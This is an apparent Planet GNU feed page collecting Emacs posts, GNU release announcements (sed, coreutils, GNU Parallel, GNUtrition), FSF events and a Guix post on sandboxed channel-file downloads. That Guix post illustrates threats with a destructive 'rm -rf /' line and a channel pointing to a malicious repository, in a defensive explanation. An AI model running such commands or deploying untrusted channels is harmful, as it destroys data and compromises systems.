ExcitingAds! Planet GNU

Amin Bandali: FFS code review and Emacs extensibility with Protesilaos

Fri, 15 May 2026 12:50:10 +0000

In the recent weeks I've been engaging Prot as an Emacs coach to help with doing review passes over my upcoming ffs package as I work on polishing and documenting it in preparation for offering it for inclusion in GNU ELPA.

UPDATE 2026-05-15 08:50:10 -0400: Prot also published an article about our session on his website: https://protesilaos.com/codelog/2026-05-15-emacs-amin-bandali-ffs-display-buffer-org-capture/

Today we had our third session where we started by reviewing and talking about my recent changes to ffs, then ventured to other Emacs-related topics with the overarching theme of the flexibility and extensibility of GNU Emacs, including display-buffer-alist, keyboard macros, defining a custom ox-bhtml Org export backend derived from Org's ox-html for ultimate flexibility when exporting my site's pages from Org to HTML, Org capture, plain text files and Emacs's diary and how it compares to org-agenda, and keeping a journal with the help of Emacs.

Here is the video recording of our session, which I share with Prot's permission:

Sorry, this embedded video will not work, because your web browser does not support HTML5 video.
[ please watch the video in your favourite streaming media player ]â€‹

You can view or download the full-resolution video from the Internet Archive.

Lastly, here is the snippet Prot shared for having Isearch treat space as a wildcard, helpful for more easily matching multiple parts of a line:

(setq search-whitespace-regexp ".*?")
(setq isearch-lax-whitespace t)
(setq isearch-regexp-lax-whitespace nil)

Take care, and so long for now.

gnutrition @ Savannah: GNUtrition 0.33.0rc2 Now Available

Wed, 13 May 2026 21:40:19 +0000

A test release of GNUtrition, 0.33.0rc2, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release makes some fixes to the gender option. It also applies a fix to ./version.sh that affected builds from CVS checkouts, which was not an issue with the tarball, due to the tarballs including the version in a .ver file.

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:

Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org> (https://lists.gnu ... fo/bug-gnutrition).

FSF Events: Free Software vs malware and the need for reverse engineering

Wed, 13 May 2026 18:59:33 +0000

June 16, 2026 from 16:00 to 18:00 (CET).

GNU Guix: Time travel without borders

Tue, 12 May 2026 12:48:33 +0000

When offered the option to run other peopleâ€™s code, a prime consideration is often ease of deployment. While much progress has been made in support of rapid deployment, the security implications of those quick deployments is often overlooked. In this post, we look at a new feature of guix time-machine and guix pull in support of one-line deployment commands: the ability to download channel files, but without compromising on security.

Sharing code

The normal workflow to share software and make it easily deployable with Guix goes like this: someone puts their packager hat on and writes a package definition, adds it to Guix proper or to a separate channel, at which point anyone can fetch the relevant channel(s) and deploy the software.

As an example, letâ€™s assume you want to run yt-dlp as packaged in the latest Guix revision without upgrading your system or going through an explicit installation step. The simplest way to do that is with this command:

guix time-machine -q -- shell yt-dlp -- yt-dlp â€¦

If youâ€™re familiar with Nix, this is equivalentâ€”with some important differences weâ€™ll discuss belowâ€”to this command:

nix shell nixpkgs#yt-dlp --command yt-dlp â€¦

In both cases, weâ€™re fetching the latest revision of the package collection (the master branch for Guix, the nixpkgs-unstable branch of Nixpkgs for Nix) and running yt-dlp from there. (nix run goes one step further by removing the need to specify the command name.)

Now, that was an easy example because yt-dlp comes from Guix itself. What if youâ€™d like to deploy an application thatâ€™s in another channel such as Guix-Science? Well, you would first need to come up with a channels.scm file for Guix-Science and then you can pass it to guix pull or guix time-machine:

$EDITOR channels.scm
# Make sure that includes Guix-Science.
guix time-machine -C channels.scm -- shell â€¦

If youâ€™re lucky, perhaps you can download a channel file. For example, Cuirass produces them for all successfully-evaluated commits, so you can fetch one for Guix-Science and go from there:

wget -O channels.scm \
  https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
guix time-machine -C channels.scm -- shell â€¦

You can even do it in a single command using Bash process substitution!

guix time-machine \
  -C <(wget -O https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science) \
  -- shell â€¦

Is it a good idea though?

The threat

If you look more closely, the nix shell command and the last two guix time-machine commands have a bit of a curl | sh flavor to it: downloading arbitrary code and running it without further ado. All nix shell does is authenticate github.com, through HTTPS, and likewise for wgetâ€”that youâ€™re downloading from the genuine github.com doesnâ€™t tell you anything about the trustworthiness of the code youâ€™re running.

In the case of Guix, the channels.scm youâ€™re downloading could very well read this:

(system* "rm" "-rf" "/")  ;uh-oh!

Here system*, as you might have guessed, invokes a command. Because yes, channel files can contain arbitrary Scheme code! (Itâ€™s worth noting that this particular problem is one Nix doesnâ€™t have: Nix being a domain-specific language (DSL) already limits what Nix code can do, especially with so-called â€œpureâ€� evaluation.)

Or it could read something like this:

(list (channel
        (name 'guix)
        ;; This is Malloryâ€™s malicious Guix, now youâ€™re PWND!
        (url "https://example.org/EVIL/guix.git")
        (branch "master")
        (introduction
         (make-channel-introduction
          "badc0ffeed807b096b48283debdcddccfea34bad"
          (openpgp-fingerprint
           "DEAD CABB A99E F6A8 0D1D  E643 A2A0 6DF2 A33A BADD")))))

In this case, the channel file looks good, but the channel youâ€™ll fetchâ€”probably not so much.

So no: downloading a channel file and using it without checking it is not reasonable.

The cake

Can we have our cake and eat it too? Can we casually download someone elseâ€™s channel file without putting our system at risk?

Changes that have just landed in guix pull and guix time-machine aim to address these seemingly contradictory needs. The two commands are now equipped to download by themselves: just pass them a URL with the -C (or --channels) option.

guix time-machine \
  -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master \
  -- â€¦

Crucially, this command is not equivalent to the naÃ¯ve -C <(wget -O â€¦) trick we saw above.

First, channel code is now evaluated in a â€œsandboxâ€�: it can only access a predefined set of bindings, cannot import additional modules, and it must run in a limited amount of time and with a limited amount of memory allocated. This still provides access to many general-purpose facilities but blocks anything that could be used to alter the system state, exfiltrate data, or cause a denial of service.

With this in place, evaluating a channel file can be considered safe. Now, one problem remains: the file might list channels that I as a user do not trust. And here we see a tension between fetching channel files from out there and keeping oneâ€™s system safe. To address that, we define a new rule: only trusted channels may be deployed; if a channel file lists untrusted channels, guix pull and guix time-machine error out. Trusted channels are defined as follows:

they are those listed in ~/.config/guix/trusted-channels.scm, if it existsâ€”this file lists channels just like a regular channel file;
or, they are the channels currently in use, as returned by guix describe.

This brings us to the interesting question of channel identity. This channel I call guix-science in my trusted-channels.scm, someone else might as well call it Guix-Science or science; how can I tell if weâ€™re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesnâ€™t matter; the element that does matter is the â€œintroductionâ€� of the channelâ€”the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup ğŸ‘‡ is the channelâ€™s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticatedâ€”i.e., that lacks the introduction fieldâ€”cannot be considered a trusted channel.

Overall, this â€œtrusted channelâ€� rule trades flexibility for safety. Itâ€™s a tradeoff but one that looks like a better default than anything that effectively amounts to arbitrary code execution Ã la curl | sh.

The party

â€œWhy would I want to download channel files?â€�, you may ask? Hereâ€™s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration systemâ€”to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how youâ€™d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if youâ€™re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as a channel files where each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull fromâ€”it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.

Dissonance?

But waitâ€¦ the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That canâ€™t be right: the channel file could change over time, or it could vanish from its original URL. Thatâ€™s not reproducibility, is it?

As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies â€œcontentâ€�â€”raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive and so all we had to do is connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- â€¦

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking for a while, and itâ€™s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guileâ€™s â€œsandboxingâ€�, channel authentication, and Software Heritage integration.

The whole endeavorâ€”allowing for quick deployment without compromising on securityâ€”might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like thereâ€™s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and letâ€™s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb â€œReepcaâ€� Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

gnutrition @ Savannah: GNUtrition 0.33.0rc1 Now Available

Sat, 09 May 2026 03:04:20 +0000

A test release of GNUtrition, 0.33.0rc1, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release is for the C rewrite, which is usable with GTK and ncurses based interfaces, along with a noninteractive mode. The database was updated from the USDA DSR to the USDA FNDDS.

Thank you, very much to Jason Self for providing us with the rewrite. This release would not have been possible without it!

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/. This test release can be obtained from the alpha.gnu.org server at one of the following:

Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org>.

FSF Events: Free Software Directory meeting on IRC: Friday, May 8, starting at 12:00 EDT (16:00 UTC)

Fri, 08 May 2026 14:36:02 +0000

Join the FSF and friends on Friday, May 15 from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

Amin Bandali: FFS code review with Protesilaos

Fri, 08 May 2026 02:10:33 +0000

Yesterday we had our second session focused on ffs, which I recorded and share publicly with everyone with Prot's permission, so that others can also benefit from Prot's insights and experience as we discuss various aspects of Emacs package development with the concrete example of ffs.

Here is the video recording of our session:

Sorry, this embedded video will not work, because your web browser does not support HTML5 video.
[ please watch the video in your favourite streaming media player ]â€‹

You can view or download the full-resolution video from the Internet Archive.

I addressed most of Prot's feedback about ffs from our first session, and I'll be working on the changes we discussed in this session in the next days.

In the last third of the video we switched topics to discuss a few Emacs-related tangents including adding a 'padding' effect for the mode line and its constructs, and distilling and separating the easily-reusable package-like parts of one's Emacs configuration from the actual configuration of those parts (e.g. the distinction of prot-lisp and prot-emacs-modules in Prot's Emacs configuration).

For mode line padding, here is the snippet I'm using with Prot's doric-themes:

(doric-themes-with-colors
  (custom-set-faces
   `(mode-line
     ((t :box (:line-width 6 :color ,bg-shadow-intense))))
   `(mode-line-inactive
     ((t :box (:line-width 6 :color ,bg-shadow-subtle))))
   `(mode-line-highlight
     ((t :box (:color ,bg-shadow-intense))))))

Take care, and so long for now.

Amin Bandali: Emacs Chat with Sacha Chua

Tue, 05 May 2026 23:43:44 +0000

Yesterday I joined Sacha Chua for a new episode of her Emacs Chat podcast, where we talked about Emacs and life. I gave a quick tour of my Emacs configuration, discussing at length my configurations for EXWM (Emacs X Window Manager) among other topics like Emacs's facility for visually indicating buffer boundaries in the fringe by setting indicate-buffer-boundaries and my convenience configuration macros.

Sorry, this embedded video will not work, because your web browser does not support HTML5 video.
[ please watch the video in your favourite streaming media player ]â€‹

The above video is provided with closed captions and the below transcript courtesy of Sacha with minor fixes and formatting by me. I've included some of Sacha's screenshots from our chat, you can see the rest on the episode's page on Sacha's blog.

A few links from our chat:

It was a lot of fun - thanks again for having me, Sacha!

Take care, and so long for now.

Transcript

For the full transcript please see: https://kelar.org/~bandali/gnu/emacs/emacs-chat-202605.html

FSF Blogs: FSD meeting and weekly recap 2026-05-01

Mon, 04 May 2026 15:15:59 +0000

Check out the important work our volunteers accomplished this week and at today's Free Software Directory (FSD) IRC meeting.

FSF Blogs: April GNU Spotlight with Amin Bandali featuring nineteen new GNU releases: Parallel, Time, and more!

Mon, 04 May 2026 13:19:31 +0000

GNU Taler news: LibEuFin Connector for Dolibarr is out

Fri, 01 May 2026 22:00:00 +0000

by Bohdan Potuzhnyi

www @ Savannah: Malware in Proprietary Software - Latest Additions

Fri, 01 May 2026 18:08:11 +0000

The initial injustice of proprietary software often leads to further injustices: malicious functionalities.

The introduction of unjust techniques in nonfree software, such as back doors, DRM, tethering, and others, has become ever more frequent. Nowadays, it is standard practice.

We at the GNU Project show examples of malware that has been introduced in a wide variety of products and dis-services people use everyday, and of companies that make use of these techniques.

Here are our latest additions

April 2026

Proprietary Obsolescence

Amazon is disconnecting the early models of the Swindle from the Amazon DRM-afflicted book store.

Malware in Appliances

Some models of Vizio “smart” TVs will have some of their functionalities locked behind a Walmart account login.

FSF Blogs: It's May, and we've been keeping busy

Fri, 01 May 2026 17:49:38 +0000

All four teams at the Free Software Foundation (FSF) have been working tirelessly the past four months, and we have a lot to show for it!

health @ Savannah: GNU Health featured at the Cyber|Show UK

Fri, 01 May 2026 09:41:31 +0000

GNU Health at the Cyber|Show!
Grab a coffee and listen to the 40 min. interview Andy Farnell and Helen Plews made to Luis Falcón in their wonderful show. ❤️

They covered key aspects on citizen and patient data privacy, hospital management, federated health networks, genomics and wearables. In the interview they also talked about the risks associated to commercial, closed sourced electronic health records systems and proprietary mobile applications.

The interview reveals how crucial is Free/Libre software for equity and digital sovereignty in our societies. 🩺 🏥 🧬 👇️
https://cybershow ... pisodes.php?id=64

About Cyber|Show:
https://cybers ... w.uk/about.php

Get this and latest news about GNU Health from our official Mastodon account:
https://mastodon. ... social/@gnuhealth

Tags: #GNUHealth #GNU #OpenScience #PublicHealth #Privacy #FreeSoftware #SocialMedicine #CyberShow

FSF Events: LibreLocal meetup in London, England, United Kingdom

Mon, 27 Apr 2026 13:55:00 +0000

May 16, 2026 at 12:00 BST (11:00 UTC). NOTE: New location.

FSF Events: LibreLocal meetup in Neuchâtel, Switzerland

Mon, 27 Apr 2026 13:42:53 +0000

May 21, 2026 at 16:00 CEST (14:00 UTC).

FSF Events: LibreLocal meetup in València, Spain

Mon, 27 Apr 2026 13:34:05 +0000

May 16, 2026 at 10:30 CEST (08:30 UTC).

parallel @ Savannah: GNU Parallel 20260422 ('Artemis II') released

Wed, 22 Apr 2026 21:50:23 +0000

GNU Parallel 20260422 ('Artemis II') has been released. It is available for download at: lbry://@GnuParallel:4

Quote of the month:

It is a fantastic tool for decades!
-- Ops_Mechanic@reddit

New in this release:

Remote jobs are spawned via pipe to perl, so environment can be bigger. This is a major rewrite.
--pipe-part -a supports -L/-N if zextract is installed.
--pipe-part -a supports .gz, .bz2, .zst-files if zextract is installed.
Comments in code is redone.
Bug fixes and man page updates.

GNU Parallel - For people who live life in the parallel lane.

If you like GNU Parallel record a video testimonial: Say who you are, what you use GNU Parallel for, how it helps you, and what you like most about it. Include a command that uses GNU Parallel if you feel like it.

About GNU Parallel

GNU Parallel is a shell tool for executing jobs in parallel using one or more computers. A job can be a single command or a small script that has to be run for each of the lines in the input. The typical input is a list of files, a list of hosts, a list of users, a list of URLs, or a list of tables. A job can also be a command that reads from a pipe. GNU Parallel can then split the input and pipe it into commands in parallel.

If you use xargs and tee today you will find GNU Parallel very easy to use as GNU Parallel is written to have the same options as xargs. If you write loops in shell, you will find GNU Parallel may be able to replace most of the loops and make them run faster by running several jobs in parallel. GNU Parallel can even replace nested loops.

GNU Parallel makes sure output from the commands is the same output as you would get had you run the commands sequentially. This makes it possible to use output from GNU Parallel as input for other programs.

For example you can run this to convert all jpeg files into png and gif files and have a progress bar:

parallel --bar convert {1} {1.}.{2} ::: *.jpg ::: png gif

Or you can generate big, medium, and small thumbnails of all jpeg files in sub dirs:

find . -name '*.jpg' |
    parallel convert -geometry {2} {1} {1//}/thumb{2}_{1/} :::: - ::: 50 100 200

You can find more about GNU Parallel at: http://www.gnu ... rg/s/parallel/

You can install GNU Parallel in just 10 seconds with:

    $ (wget -O - pi.dk/3 || lynx -source pi.dk/3 || curl pi.dk/3/ || \
       fetch -o - http://pi.dk/3 ) > install.sh
    $ sha1sum install.sh | grep c555f616391c6f7c28bf938044f4ec50
    12345678 c555f616 391c6f7c 28bf9380 44f4ec50
    $ md5sum install.sh | grep 707275363428aa9e9a136b9a7296dfe4
    70727536 3428aa9e 9a136b9a 7296dfe4
    $ sha512sum install.sh | grep b24bfe249695e0236f6bc7de85828fe1f08f4259
    83320d89 f56698ec 77454856 895edc3e aa16feab 2757966e 5092ef2d 661b8b45
    b24bfe24 9695e023 6f6bc7de 85828fe1 f08f4259 6ce5480a 5e1571b2 8b722f21
    $ bash install.sh

Watch the intro video on http://www.youtub ... L284C9FF2488BC6D1

Walk through the tutorial (man parallel_tutorial). Your command line will love you for it.

When using programs that use GNU Parallel to process data for publication please cite:

O. Tange (2018): GNU Parallel 2018, March 2018, https://doi.org/1 ... 81/zenodo.1146014.

If you like GNU Parallel:

Give a demo at your local user group/team/colleagues
Post the intro videos on Reddit/Diaspora*/forums/blogs/ Identi.ca/Google+/Twitter/Facebook/Linkedin/mailing lists
Get the merchandise https://gnuparall ... igns/gnu-parallel
Request or write a review for your favourite blog or magazine
Request or build a package for your favourite distribution (if it is not already there)
Invite me for your next conference

If you use programs that use GNU Parallel for research:

Please cite GNU Parallel in you publications (use --citation)

If GNU Parallel saves you money:

(Have your company) donate to FSF https://my.f ... .org/donate/

About GNU SQL

GNU sql aims to give a simple, unified interface for accessing databases through all the different databases' command line clients. So far the focus has been on giving a common way to specify login information (protocol, username, password, hostname, and port number), size (database and table size), and running queries.

The database is addressed using a DBURL. If commands are left out you will get that database's interactive shell.

When using GNU SQL for a publication please cite:

O. Tange (2011): GNU SQL - A Command Line Tool for Accessing Different Databases Using DBURLs, ;login: The USENIX Magazine, April 2011:29-32.

About GNU Niceload

GNU niceload slows down a program when the computer load average (or other system activity) is above a certain limit. When the limit is reached the program will be suspended for some time. If the limit is a soft limit the program will be allowed to run for short amounts of time before being suspended again. If the limit is a hard limit the program will only be allowed to run when the system is below the limit.

FSF Blogs: RAIL: Nonfree and unethical

Wed, 22 Apr 2026 20:40:00 +0000

Any software license that denies users their freedom is by definition nonfree and unethical, and so-called "Responsible AI" Licenses (RAIL) are no exception. If we want software to help decrease social injustice, we should oppose licenses that restrict how software can be used.

sed @ Savannah: sed-4.10 released [stable]

Wed, 22 Apr 2026 02:00:45 +0000

This is to announce sed-4.10, a stable release.

It's been more than 3.5 years and quite a few new bug fixes.
Special thanks to Paul Eggert, Bruno Haible and Collin Funk
for all their help, and especially to Bruno for all the gnulib
support and thorough and indefatigable testing and analysis.

There have been 92 commits by 9 people in the 180 weeks since 4.9.

See the NEWS below for a brief summary.

Thanks to everyone who has contributed!
The following people contributed changes to this release:

Arkadiusz Drabczyk (2)
Ash Roberts (1)
Brun Haible (1)
Bruno Haible (5)
Collin Funk (5)
Hans Ginzel (1)
Jim Meyering (60)
Paul Eggert (16)
Weixie Cui (1)

Jim
[on behalf of the sed maintainers]
==================================================================

Here is the GNU sed home page:
    https://gnu.org/s/sed/

Here are the compressed sources:
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz   (2.7MB)
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz   (1.7MB)

Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.gz.sig
https://ftp.gnu.org/gnu/sed/sed-4.10.tar.xz.sig

Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

SHA256 (sed-4.10.tar.gz) = TRef+vkuxNzsVB98Ayvhw7mhhW9JcK25WlBSIXAvUnc=
SHA3-256 (sed-4.10.tar.gz) = ftB7Hf2uN4RnayBEgasV7KmqZqCxBUj7e+Am6WDaiKk=
SHA256 (sed-4.10.tar.xz) = uOchgrLslqNXTimYxHt6qmTMIM4ADY6awxPMB87PKMc=
SHA3-256 (sed-4.10.tar.xz) = bVWJvXR28fvhgP1XTpej6t8V+Bh2YI1lL6aGBy1cG5c=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:

gpg --verify sed-4.10.tar.gz.sig

The signature should match the fingerprint of the following key:

pub   rsa4096/0x7FD9FCCB000BEEEE 2010-06-14 [SCEA]
        Key fingerprint = 155D 3FC5 00C8 3448 6D1E EA67 7FD9 FCCB 000B EEEE
uid                   [ unknown] Jim Meyering <jim@meyering.net>
uid                   [ unknown] Jim Meyering <meyering@fb.com>
uid                   [ unknown] Jim Meyering <meyering@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key jim@meyering.net

gpg --recv-keys 7FD9FCCB000BEEEE

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=sed&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify sed-4.10.tar.gz.sig

This release is based on the sed git repository, available as

git clone https://https.git.savannah.gnu.org/git/sed.git

with commit 89b7a2224d4faa9d8baf76094b1232ad1477ef3e tagged as v4.10.

For a summary of changes and contributors, see:

https://gitweb.git.savannah.gnu.org/gitweb/?p=sed.git;a=shortlog;h=v4.10

or run this command from a git-cloned sed directory:
git shortlog v4.9..v4.10

This release was bootstrapped with the following tools:
Autoconf 2.73.1-b400b
Automake 1.18.1.91
Gnulib 2026-04-19 15211966deb52d4cae425c655177a815a88d3fc0

NEWS

* Noteworthy changes in release 4.10 (2026-04-21) [stable]

** Bug fixes

sed 's/a/b/g' (and other global substitutions) now works on input
lines longer than 2GB. Previously, matches beyond the 2^31 byte offset
would evoke a "panic" (exit 4).
[bug present since the beginning]

'sed --follow-symlinks -i' no longer has a TOCTOU race that could let
an attacker swap a symlink between resolution and open, causing sed to
read attacker-chosen content and write it to the original target.
[bug introduced in sed 4.1e]

sed no longer falsely matches when back-references are combined with
optional groups (.?) and the $ anchor. For example, this no longer
falsely matches the empty string at beginning of line:
    $ echo ab | sed -E 's/^(.?)(.?).?\2\1$/X/'
    Xab
[bug present since "the beginning"]

In --posix mode, sed no longer mishandles backslash escapes (\n,
\t, \a, etc.) after a named character class like [[:alpha:]].
For example, 's/^A\n[[:alpha:]]\n*/XXX/' would fail to match the
trailing newline, treating \n as a literal backslash and an 'n'
rather than a newline. This happened when an earlier backslash
escape in the same regex had already been converted, shifting the
in-place normalization buffer.
[bug introduced in sed 4.9]

sed --debug no longer crashes when a label (":") command is compiled
before the --debug option is processed, e.g., sed -f<(...) --debug.
[bug introduced in sed 4.7 with --debug]

sed no longer rejects the documented GNU extension 'a**' (equivalent
to 'a*') in Basic Regular Expression (BRE) mode. Previously, this
worked only with -E (ERE mode), even though grep has always accepted
it in BRE mode.
[bug present since "the beginning"]

sed no longer rejects "\c[" in regular expressions
[bug present since the beginning]

'sed --follow-symlinks -i' no longer mishandles an operand that is a
short symbolic link to a long symbolic link to a file.
[bug introduced in sed 4.9]

Fix some some longstanding but unlikely integer overflows.
Internally, 'sed' now more often prefers signed integer arithmetic,
which can be checked automatically via 'gcc -fsanitize=undefined'.

** Changes in behavior

In the default C locale, diagnostics now quote 'like this' (with
apostrophes) instead of `like this' (with a grave accent and an
apostrophe). This tracks the GNU coding standards.

'sed --posix' now warns about uses of backslashes in the 's' command
that are handled by GNU sed but are not portable to other
implementations.

** Build-related

builds no longer fail on platforms without the <getopt.h> header or
getopt_long function.
[bug introduced in sed 4.9]

coreutils @ Savannah: coreutils-9.11 released [stable]

Mon, 20 Apr 2026 14:10:56 +0000

This is to announce coreutils-9.11, a stable release.

Notable changes include:
- cut(1), nl(1), and un/expand(1) are multi-byte character aware
- cut(1) supports new -w, -F, -O options for better compatibility
- cat(1) and yes(1) use zero-copy I/O on Linux (up to 15x faster)
- date(1) now parses dot delimited dd.mm.yy format
- cksum --check uses more defensive file name quoting
- shuf -i operates up to 2x faster by using unlocked stdio
- wc -l operates up to 4.5x faster on hosts with neon instructions
- wc -m is up to 2.6x faster when processing multi-byte characters

There have also been many bug fixes and other changes
as summarized in the NEWS below.

There have been 306 commits by 12 people in the 10 weeks since 9.10
Thanks to everyone who has contributed!

Bruno Haible (2)                Paul Eggert (15)
Chris Down (2)                  Pádraig Brady (156)
Collin Funk (91)                Sam James (1)
Dr. David Alan Gilbert (1)      Sylvestre Ledru (17)
Gabriel (1)                     Weixie Cui (2)
Lukáš Zaoral (2)                oech3 (19)

Pádraig [on behalf of the coreutils maintainers]
==================================================================

Here is the GNU coreutils home page:
    https://gnu.org/s/coreutils/

Here are the compressed sources:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz   (16MB)
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz   (6.3MB)

Here are the GPG detached signatures:
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.gz.sig
https://ftp.gnu.org/gnu/coreutils/coreutils-9.11.tar.xz.sig

Use a mirror for higher download bandwidth:
https://www.gnu.org/order/ftp.html

Here are the SHA256 and SHA3-256 checksums:

SHA256 (coreutils-9.11.tar.gz) = IDO4owScBr/0mp486nK99Gg7zQy+uXUhHdVtuvi3Nq4=
SHA3-256 (coreutils-9.11.tar.gz) = TwFrSgPuppf+jNggT+aXj037UfVVS2BmYBxXiPLYKxs=
SHA256 (coreutils-9.11.tar.xz) = OUAk7aCllVIXztqc0SAeZdyPo6opwpURNaSVIdV8PMM=
SHA3-256 (coreutils-9.11.tar.xz) = RkpNMip8O4ly+z3Fef9X20AsotbT1ycBZ5UbG84SiNM=

Verify the base64 SHA256 checksum with 'cksum -a sha256 --check'
from coreutils-9.2 or OpenBSD's cksum since 2007.

Verify the base64 SHA3-256 checksum with 'cksum -a sha3 --check'
from coreutils-9.8.

Use a .sig file to verify that the corresponding file (without the
.sig suffix) is intact. First, be sure to download both the .sig file
and the corresponding tarball. Then, run a command like this:

gpg --verify coreutils-9.11.tar.gz.sig

The signature should match the fingerprint of the following key:

pub   rsa4096/0xDF6FD971306037D9 2011-09-23 [SC]
        Key fingerprint = 6C37 DC12 121A 5006 BC1D B804 DF6F D971 3060 37D9
uid                   [ultimate] Pádraig Brady <P@draigBrady.com>
uid                   [ultimate] Pádraig Brady <pixelbeat@gnu.org>

If that command fails because you don't have the required public key,
or that public key has expired, try the following commands to retrieve
or refresh it, and then rerun the 'gpg --verify' command.

gpg --locate-external-key P@draigBrady.com

gpg --recv-keys DF6FD971306037D9

wget -q -O- 'https://savannah.gnu.org/project/release-gpgkeys.php?group=coreutils&download=1' | gpg --import -

As a last resort to find the key, you can try the official GNU
keyring:

wget -q https://ftp.gnu.org/gnu/gnu-keyring.gpg
gpg --keyring gnu-keyring.gpg --verify coreutils-9.11.tar.gz.sig

This release is based on the coreutils git repository, available as

git clone https://https.git.savannah.gnu.org/git/coreutils.git

with commit c01fd163a47468a8296fb369f5233853bb551bb6 tagged as v9.11.

For a summary of changes and contributors, see:

https://gitweb.git.savannah.gnu.org/gitweb/?p=coreutils.git;a=shortlog;h=v9.11

or run this command from a git-cloned coreutils directory:

git shortlog v9.10..v9.11

This release was bootstrapped with the following tools:
Autoconf 2.73.1-b400b
Automake 1.18.1
Gnulib 2026-04-19 fb7312fa8d3df29f0ca0678f669b9a5b88a078ec
Bison 3.8.2

NEWS

* Noteworthy changes in release 9.11 (2026-04-20) [stable]

** Bug fixes

'dd' now always diagnoses partial writes correctly upon write failure.
Previously it may have indicated that only full writes were performed.
[This bug was present in "the beginning".]

'fold' will no longer truncate output when encountering 0xFF bytes.
[bug introduced in coreutils-9.8]

'fold' is again responsive to its input. Previously it would have delayed
processing until 256KiB was read from the input.
[bug introduced in coreutils-9.8]

'kill --help' now has links to valid anchors in the html manual.
[bug introduced in coreutils-9.10]

When configured with --enable-systemd, the commands 'pinky',
'uptime', 'users', and 'who' no longer consider the systemd session
